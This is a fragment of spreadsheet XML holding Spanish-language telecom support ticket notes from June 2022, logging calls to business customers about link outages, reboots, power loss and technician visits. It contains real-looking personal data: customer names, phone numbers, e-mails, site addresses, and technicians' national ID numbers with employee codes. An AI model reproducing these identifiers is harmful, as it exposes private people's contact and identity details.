    <t>F4603873</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN PUNTO REMOTO, ATIENDE SELVIN, INDICA QUE ESTA BUSCANDO EL EQUIPO ETX1, PERO LUEGO SE CORTA LA LLAMADA, SE INTENTARA LUEGO.
3001499920
COLA:
NOMBRE: A: 78467645
NÚMERO: 78467645
DURACIÓN: 0:02:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:ERROR TRANSITORIO (CÓDIGO 41 CAUSA ISDN)]
DETALLES: 78467645
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 09:23:37</t>
  </si>
  <si>
    <t>SE NUEVAMENTE A CLIENTE SELVIN EN LINEA
3001501472
COLA:
NOMBRE: A: 78467645
NÚMERO: 78467645
DURACIÓN: 0:01:39
ESTADO: CONECTADA
DETALLES: 78467645
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 09:26:26</t>
  </si>
  <si>
    <t>SE LE SOLICITA APOYO A CLIENTE PARA APLICAR REINICIO A EQUIPO ETX 1, SE LE PROPORCIONAN CARACTERISTICAS FISICAS Y MARCA, PARA UBICARLO, INDICA  QUE LO ESTA BUSCANDO, DEJA EN ESPERA Y LUEGO SE CORTA NUEVAMENTE LA LLAMADA, SE INTENTARA LUEGO.
3001501472
COLA:
NOMBRE: A: 78467645
NÚMERO: 78467645
DURACIÓN: 0:04:25
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:ERROR TRANSITORIO (CÓDIGO 41 CAUSA ISDN)]
DETALLES: 78467645
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 09:29:21</t>
  </si>
  <si>
    <t>F4603880</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS ORTIZ AL 70696529 INDICA QUE PERSISTE LA INESTABILIDAD SE SOLICITAN DATOS PARA VISITA
HORARIO DE ATENCION: 9:00 A 18:00 HRS
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR LISTADO DEL PERSONAL TEC AL CORREO LORTIZ@OMNISPORT.COM
DIRECCION: CENTRO COMERCIAL PLAZA MUNDO 2 LOCAL 157 SOYAPANGO SAN SALVADOR.
ATENDERA EN SITIO: LASTENIA TORRES
-ID 3001502153
**</t>
  </si>
  <si>
    <t>SE  ENVIA  CORREO A CLIENTE  SOLICITANDO ACCESOS
GESTIÓN DE ACCESO F4603880 | IP2045135SV | OMNISPORT S.A. DE C.V. | SOYAPANGOCTRO COM PLAZA MUNDOBOULEVARD DEL EJERCITOLOCAL 157LOCALES DEL 157 AL 159
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:LORTIZ@OMNISPORT.COM
CC:GRUPO N1;CNOCCA
JUE 16/06/2022 10:56
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4603880 | IP2045135SV | OMNISPORT S.A. DE C.V.  | SOYAPANGOCTRO COM PLAZA MUNDOBOULEVARD DEL EJERCITOLOCAL 157LOCALES DEL 157 AL 159
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
DUI CODIGO EMPLEADO
00580847-9 2181 CARLOS EDUARDO GOMEZ ZELEDON
02878871-1 2437 JOSE ALFREDO JIMENEZ
02085886-3 4492 JESUS OPICO CASTILLO
01968544-3 9407 WALTER ERNESTO RODRIGUEZ PEREZ
00128596-2 2987 DANIEL MARTINES
02884962-2 4551  RENE RAMON ALVARENGA
04086816-7 12404 GERARDO ANTONIO MINERO
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4603889</t>
  </si>
  <si>
    <t>SE LLAMA A KAREN COURTADE-78554412 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001628516</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO CASTILLO-76029460 ##VIVO## NO CONTESTA ## SE INTENTARA NUEVAMENTE EN BREVE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO CASTILLO-76029460 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001553181</t>
  </si>
  <si>
    <t>## SE HABLA CON EJECUTIVO KAREN COURTADE || 22717146/78554412 COURTADE.KAREN@CLARO.COM.SV COMENTA QUE HOY POR LA MAÑANA PASARON ESTE SERVICIO HACIA CLARO
3001500415
COLA:
NOMBRE: A: 0050378554412
NÚMERO: 0050378554412
DURACIÓN: 0:02:51
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378554412
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 09:26:24</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO CASTILLO-76029460  NO CONTESTA ##ENVIA A BUZON ##
3001539771
COLA:
NOMBRE: A: 0050376029460
NÚMERO: 0050376029460
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376029460
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 11:08:59
3001539946
COLA:
NOMBRE: A: 0050376029460
NÚMERO: 0050376029460
DURACIÓN: 0:00:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376029460
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 11:09:07</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO CASTILLO-76029460 -- NO CONTESTA ##ENVIA A BUZON ##
3001527752
COLA:
NOMBRE: A: 0050376029460
NÚMERO: 0050376029460
DURACIÓN: 0:00:17
ESTADO: MARCANDO
DETALLES: 0050376029460
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 10:37:06
RESULTADO: LLAMADA HECHA
NOMBRE: 0050376029460
NÚMERO: 0050376029460
INICIO: HOY, 10:37
FIN: HOY, 10:37
DURACIÓN: 0:34
ID DE LLAMADA: 3001527882</t>
  </si>
  <si>
    <t>SE LLAMA AA EJECUTIVA  KAREN COURTADE-78554412 INDCA QUE YA SE PUEDE PROCEDER CON EL CIERRE##A NVIEL DE CLARO TODO OK ## Y CLIENTE ESTA VERIFICANDO SU PBX DEBIDO A QUE SU NUMERO PRINCIPAL NO FUNCIONA ### A NIVEL DE CLARO SE CONMUTO EL SERVICI NUEVAMENTE DEBIDO A QUE TENIA OT DE ALTA ###SE PROCEDE AL CIERRE##VIVO</t>
  </si>
  <si>
    <t>SE LLLAMA A EJECUTIVA KAREN COURTADE-78554412 E INDICA QUE SE LE CONTACTE A LAS 13:30 ##CLIENTE NO LE CONTESTO ##REALIZARA PRUEBAS CON CLIENTE##
3001544836
COLA:
NOMBRE: A: 0050378554412
NÚMERO: 0050378554412
DURACIÓN: 0:04:48
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050378554412
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 11:26:56</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO CASTILLO-76029460 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001532337 - 3001533031</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA KAREN COURTADE-78554412 ##  NO CONTESTA##ENVIA DIRECTO A BUZON ## 2 VECES##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A  KAREN COURTADE-78554412 QUIEN TRATA DE CONTACTARSE CON CLIENTE PERO NO RESPONDE POR LO QUE SOLICITA LLAMADA PARA LAS 15:30
-ID 3001603817</t>
  </si>
  <si>
    <t>F4603894</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE LUIS POCON 41595538 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001547664</t>
  </si>
  <si>
    <t>F4603900</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 15:07
PARA: EVELYN.GOMEZ@FEDECACES.COOP &lt;EVELYN.GOMEZ@FEDECACES.COOP&gt;
CC: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: F4603900 || IP2134127SV || FEDECACES DE R.L.
UBICACIÓN:CALLE PRINCIPAL BARRIO EL CENTRO LA LAGUNA CHALATENANGO
ID: IP2134127SV
BUENAS TARDES SRTA. EVELYN,
SE ENTABLA COMUNICACION CON EL CABALLERO PABLO HERNANDEZ 23099336 QUIEN INFORMA QUE A LAS 16:00HRS
CIERRAN LABORES Y POR TEMA DE DISTANCIA NUESTRO PERSONAL TÉCNICO LLEGARIA A LAS 6PM, SE RECOORDINA VISITA PARA EL DÍA SÁBADO A LAS 7:00HRS
ADJUNTAMOS LOS DATOS DEL PERSONAL, FAVOR COORDINAR VISITA TECNICA
DUI CODIGO EMPLEADO
00936126-7 4799 MARIO ERNESTO CRUZ MARQUEZ
00354722-1 4378 RONAL MOREL CRESPIN
00157708-4 4690 ABRAHAM SAMUEL PERE
02085886-3 4492 JESUS OPICO CASTILLO
01968544-3 9407 WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 4605 JOSE SALVADOR PORTILLO VELASQUE
01907591-5 3061 SAMUEL DE JESUS PEREZ LOPEZ
02400310-1 3796 EDGAR MAURICIO MONTOYA SANCHEZ
04086816-7 12404 GERARDO ANTONIO MINERO</t>
  </si>
  <si>
    <t>F4603904</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR CASTRO AL 72681515 INDICA QUE NO HA RECIBIO EL CORREO E INFORMA QUE EL CORREO ES CORRECTO ES ECASTRO@ARROCERASANFRANCISCO.COM SOLICITA QUE SE LE COMUNIQUE AL GESTOR ENCARGADO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001591596
**
**</t>
  </si>
  <si>
    <t>EN LLAMADA CON TECNICO ABRAHAM PEREZ Y MAURICIO MONTOYA Y CLIENTE EDGAR CASTRO QUIEN SOLICITA LO REALIZADO POR CLARO, AUTORIZA CIERRE DE TICKET YA QUE EL PROBLEMA NO ES CON EL ENLACE, PARECE SER PROBLEMAS CON EL SERVICIO DE INTERNET QUE LE BRINDA LA CENTRAL A LA SUCURSAL ||
POR PARTE DE CLARO TODO BIENN, SE PROCEDE CON CIERRE DE TICKET
3001660801
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 0050322503355
NÚMERO: 0050322503355
DURACIÓN: 1:39:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050322503355
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/06/2022 19:10:34</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE OSCAR CASTRO AL 72681515  IP QUE ESTAN CONSUMIENDO MAS DATOS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001512178
**</t>
  </si>
  <si>
    <t>F4603923</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001615158</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 IVR INDICA QUE TODOS LOS AGENTES SE ENCUENTRAN OCUPADOS, SE INTENTARA LUEGO
-ID 3001608970</t>
  </si>
  <si>
    <t>F4603926</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL CLIENTE PEDRO SANCHEZ 78440347 PERO INDICAN QUE NO EXISTE.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JORGE QUIEN SOLICITA UNA VISITA TECNICA, INDICA QUE NO SE REQUIREN PERMISOS DE ACCESO.
ES NECESARIO IR A VERIFICAR DE DONDE PROVIENEN LOS ERRORES Y COLOCAR EL EMULADOR PARA REALIZAR LLAMADAS.
SE APERTURA WO.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE  PERO ENVIA A BUZON.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE JORGE DE INFORMATICA PERO CORTAN LA LLAMADA.
3001599683
COLA:
NOMBRE: A: 0050326656200
NÚMERO: 0050326656200
DURACIÓN: 0:00:43
ESTADO: CONECTADA
DETALLES: 0050326656200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 14:03:34</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE AL 78524039 INDICA QUE NO SE ENCUENTRA EN LAS INSTALACIONES QUE SE LE LLAME AL SEÑOR PEDRO SANCHEZ **
-ID 3001602362
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO SÁNCHEZ AL 78440347 - 26656204 NO RESPONDE SE INTENTARA LUEGO**
-ID 3001601601- 3001601799
**</t>
  </si>
  <si>
    <t>F4603932</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GONZÁLEZ, ANIBAL AL 44990369 - 1720 - EXT 301690 CONTESTA EL SEÑOR ESVIN NAVAS INFORMA QUE TIENE TIEMPOS PROMEDIOS DE 30 A 45 MILISEGUNDOS SOLICITA QUE SE DEJE EN OBSERVACION PARA MAÑANA
A LAS 10:00 AM **
-ID 3001515849- 3001516019
**</t>
  </si>
  <si>
    <t>F4603949</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YESNER TELLEZ/ 57165897 PERO NO RESPONDE
-ID 3001664035</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANTOS GARCIA /89202711 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001664378</t>
  </si>
  <si>
    <t>F4603951</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR OVANDO-58449390   ##IINDICA QUE YA TODO ESTA OK ## APLICO REINICIO A PBX ### VALIDA CIERRE#
3001512285
COLA:
NOMBRE: A: 58449390
NÚMERO: 58449390
DURACIÓN: 0:02:09
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58449390
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 09:57:37</t>
  </si>
  <si>
    <t>F4603953</t>
  </si>
  <si>
    <t>SE VALIDA EL SERVICIO CON EL CLIENTE WILMER MURILLO
3001662111
COLA:
NOMBRE: A: 0050433792432
NÚMERO: 0050433792432
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 0050433792432
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 17:37:10</t>
  </si>
  <si>
    <t>F4603956</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MYNOR MARTINEZ AL 41007532 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001524586
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HUGO ESTRADA AL 58538501 INDICA QUE ESTA PERDIENDO LA COMUNICACION DE DE ZONA 7 A ZONA 9 SOLICITA QUE SE REALIZEN PRUEBAS INTERNAS || SE NOTIFICA A GESTOR **
ID 3001525205
**</t>
  </si>
  <si>
    <t>F4603968</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, LUIS LORENZANA, INDICA QUE TECNICOS  DE IT INTERNO LLEGARON Y REVISARON LOS EQUIPOS, POR LO QUE SE RESTABLECIÓ Y AUTORIZA CIERRE DE TICKET
3001606494
COLA:
NOMBRE: A: 56909482
NÚMERO: 56909482
DURACIÓN: 0:02:36
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 56909482
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 14:28:38</t>
  </si>
  <si>
    <t>CLIENTE APOYA CON APLICAR REINICIO AL CPE PERO SERVICIO CONTINUA INESTABLE, CONFIRMA DATOS:
DIRECCION: 04 CALLE 01-25 ZONA 04 CUILAPA SANTA ROSA
PERMISOS: IDENTIFICACION SOLAMENTE
HORARIO: 24 HORAS
CONTACTO EN SITIO: LUIS LORENZANA 56909482
NÚMERO: 7753
FIN: HOY, 11:04
ID DE LLAMADA: 3001534269</t>
  </si>
  <si>
    <t>CLIENTE JORGE LOPEZ, ENLAZA A PUNTO REMOTO PARA APLICAR REINICIO AL CPE
3001532253
COLA:
NOMBRE: 23027100
NÚMERO: 011 50223027100
DURACIÓN: 0:09:12
ESTADO: CONECTADA
DETALLES: +50223027100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 10:57:44</t>
  </si>
  <si>
    <t>F4603969</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE JAIRO VELASQUEZ 46051665 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001610372</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIRO VELASQUEZ 46051665 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001742776</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE JAIRO VELASQUEZ 46051665 SOLICITA QUE SE LE LLAME EN 5 MIN PARA CONFIRMAR ENERGIA EN SITIO **
-ID 3001644286
**</t>
  </si>
  <si>
    <t>F4603972</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 58064113 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001510532 - 3001511034</t>
  </si>
  <si>
    <t>F4603976</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JUSTO OROZCO - 51259264 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001614246</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL BRYAN ALBIZUREZ 42617499 NO RESPONDE,SE INTENTARA LUEGO
-ID 3001527444</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN FUENTES 49872286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001527032</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN FUENTES 49872286 NO RESPONDE, SE INTENTARA LUEGO **
-ID 3001541414
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CENTRAL BRYAN ALBIZUREZ 42617499 NO RESPONDE,SE INTENTARA LUEGO**
-ID 3001541190
***</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN FUENTES 49872286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001520235</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO - 51259264 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMDA EN 5 MIN
-ID 3001546144</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL QUIEN BRINDA OTROS CONTACTOS
JUSTO OROZCO - 51259264
LUIS NAVARRO - 51552078
-ID 3001545123</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO - 51259264 MENCIONA QUE AUN NO TIENE RESPUESTA POR PARTE DE PR POR LO QUE SOLICITA LLAMDA EN 30 MIN
-ID 3001550242</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN FUENTES 49872286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001544598</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JUSTO OROZCO - 51259264 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001582645</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO - 51259264 MENCIONA QUE AUN NO TIENE RESPUESTA POR PARTE DE PR
-ID 3001571191</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JUSTO OROZCO - 51259264 INDICA QUE SE LE LLAME EN  1 HR YA QUE NO SE HA LOGRADO COMUNICAR A LA FISCALIA **
-ID 3001594489
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUSTO OROZCO - 51259264 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001561186
**</t>
  </si>
  <si>
    <t>F4603979</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JULIO PEREZ 36571015 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001534311</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JULIO PEREZ 36571015 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001529069 - 3001529299</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 15 MIN
-ID 3001522814</t>
  </si>
  <si>
    <t>F4603980</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDWIN SAC 42149751 SE LE CONSULTA SI TIENEN ENERGIA EN SITIO REMOTO, INFORMA QUE LLAMARA SOLICITA REGRESAR LA LLAMADA EN 30 MINS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDWIN SAC 42149751 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 3001524832</t>
  </si>
  <si>
    <t>F4603982</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 75167824 PARA BRINDAR RETROALIMENTACION
-ID 3001560346</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 75167824 QUIEN APLICA REINICIO A LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
-ID 3001515214
NOMBRE DEL CLIENTE: PUNTO IDEAL S.APUNTO IDEAL S.A
UBICACIÓN:KILOMETRO 92 CARRETERA BOACO A RIO BLANCO PLAZA SAN JOSE CONTIGUO A DEPOSITO DE COMPAÑIA CERVECERA DE NICARAGUA
CONTACTO EN SITIO: JUAN CARLOS MENDEZ
HORARIO DE ATENCION:6:00 - 22:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>EN COMUNICACIÓN CON TECNICO  -TECNICO EDWIN  89302654  Y CLIENTE JUAN CARLOS  SERIVCIO YA OPEATIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO VALTODANO  89884602 PARA BRINDAR RETROALIMENTACION
-ID 3001561116</t>
  </si>
  <si>
    <t>F4603986</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SKARLET MANZANERO 41753808 ENVIA DIRECTO A BUZON, SE LLAMARA A LA CENTRAL
-ID 3001521473</t>
  </si>
  <si>
    <t>SE VALIDA QUE CLIENTE SKARLET MANZANERO FUE QUIEN REPORTO EL INCIDENTE PERO ENVIA A BUZON
-ID 3001522121 - 3001522000</t>
  </si>
  <si>
    <t>F4603993</t>
  </si>
  <si>
    <t>CLIENTE ENRIQUE RAMOS 77404028  APOYA UBICANDO EQUIPO ASMI52 ALARMADO, LO REINICIA PERO ESTADO DEL EQUIPO PERMANECE IGUAL, SE ABRIRÁ WO PARA LA REVISIÓN. 3001527011
ESTADO ASMI52
PWR   VERDE
SYNCA ROJO
ALM   ROJO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENRIQUE RAMOS  AL  77404028 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001112553
**</t>
  </si>
  <si>
    <t>CLIENTE ENRIQUE RAMOS 77404028 COMENTA QUE NO SE ENCUENTRA EN LAS INSTALACIONES, INDICA QUE CONSULTARÁ SI HAY ALGUIEN EN EL SITIO QUE PUEDA APOYAR A REALIZAR PRUEBAS, SOLICITA SE LE LLAME EN 10 MINUTOS. ID: 3001718349</t>
  </si>
  <si>
    <t>INFORMA EL CLIENTE ENRIQUE RAMOS 77404028 QUE HOY NO LLEGÓ NADIE A LAS INSTALACIONES POR FERIADO, SOLICITA SE LE DÉ SEGUIMIENTO MAÑANA SÁBADO A LAS 8 AM. ID: 3001729241</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ENRIQUE RAMOS 77404028 COMENTA QUE EL DÍA DE HOY YA NO LLEGÓ NADIE A SUS INSTALACIONES POR LO QUE SOLICITA SE LE DÉ SEGUIMIENTO EL DÍA LUNES 20/06 A LAS 8 AM. ID: 3001891238</t>
  </si>
  <si>
    <t>F4603998</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  INGRID GARCIA 49722291 / 24454395 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001612689 - 3001612801</t>
  </si>
  <si>
    <t>SE LLAMA ALCIENTE ##ENVIA DIRECTO A BUZON ## SE INTENTARA LUEGO##VIVO
O&amp;M    #1784
%%DSP PRALNK: PLNAME="PRA_22709292";%%
RETCODE = 0  OPERATION SUCCEEDED
PRA LINK STATUS INFORMATION
---------------------------
              PRA LINK NAME  =  PRA_22709292
PRA LINK STATUS INFORMATION  =  PRA LINK IS ESTABLISHED.
                  TEI VALUE  =  0
                SERVER NAME  =  CETMSSH
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 49722291/24454395 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>SE CONTACTA AL NUMERO DE RANDALL 49722291 PARA REALIZAR PRUEBAS, PERO NO CONTESTA TAMPOCO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON  INGRID GARCIA 24454395 PARA VALIDAR SI SE PUDO COMUNICAR CON RANDALL PARA CONFIRMAR LA AFECTACION O SI SE ENCUNETRAN REALIZANDO PRUEBAS CON LA PBX PERO NO RESPONDE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON RANDALL 49722291  PERO NO NOS CONTESTA
SE CONTACTA CON INGRID 24454395  QUIEN INDICA QUE NO TIENE CONOCIMIENTO DE LA FALLA, SOLICITA QUE SE LE DE 15 MIN MIENTRAS TRATA DE COMUNICARSE CON RANDALL PARA VALIDAR CUAL ES LA AFECTACION
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RANDALL HERNANDEZ 49722291 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001612022</t>
  </si>
  <si>
    <t>F4604004</t>
  </si>
  <si>
    <t>SE HABLÓ CON OSCAR PAYES/CLIENTE 37593628 PIDE SE PROLONGUE EL MONITOREO PARA MAÑANA A LAS 11:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MICHELLE PEREIRA 52894409  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001536434</t>
  </si>
  <si>
    <t>F4604022</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGELA ALCANTARA 88848126  INFORMA QUE NO PUEDE ACCEDER AL SITIO WEB LE DA  MENSAJE DE RED NO IDENTIFICADA INFORMA QUE GESTOR LE HABIA DADO UNOS NUMEROS PARA QUE PUDIERA ENVIAR LAS FOTOS DE LOS EQUIPOS PERO NO HA PODIDO ENVIARLAS YA QUE NO LE APARECE WHATSAPP || SE NOTIFICA A GESTOR **
-ID 3001596770
**
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELA ALCANTARA 88848126 SE LE BRINDA DIAGNOSTICO PERO CLIENTE INSISTE EN QUE EL SERVICIO SIGUE CAIDO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001530000</t>
  </si>
  <si>
    <t>F4604040</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE NORMA QUIEN VALIDA EL SERVICIO Y AUTORIZA EL CIERRE.
3001614722
COLA:
NOMBRE: A: 0050322312700
NÚMERO: 0050322312700
DURACIÓN: 0:00:24
ESTADO: MARCANDO
DETALLES: 0050322312700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 14:54:39</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE NORMA RAMIREZ QUIEN INDICA QUE NO TENIA LINEA Y QUE ESCUCHABA UN RUIDO EN LA LINEA.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
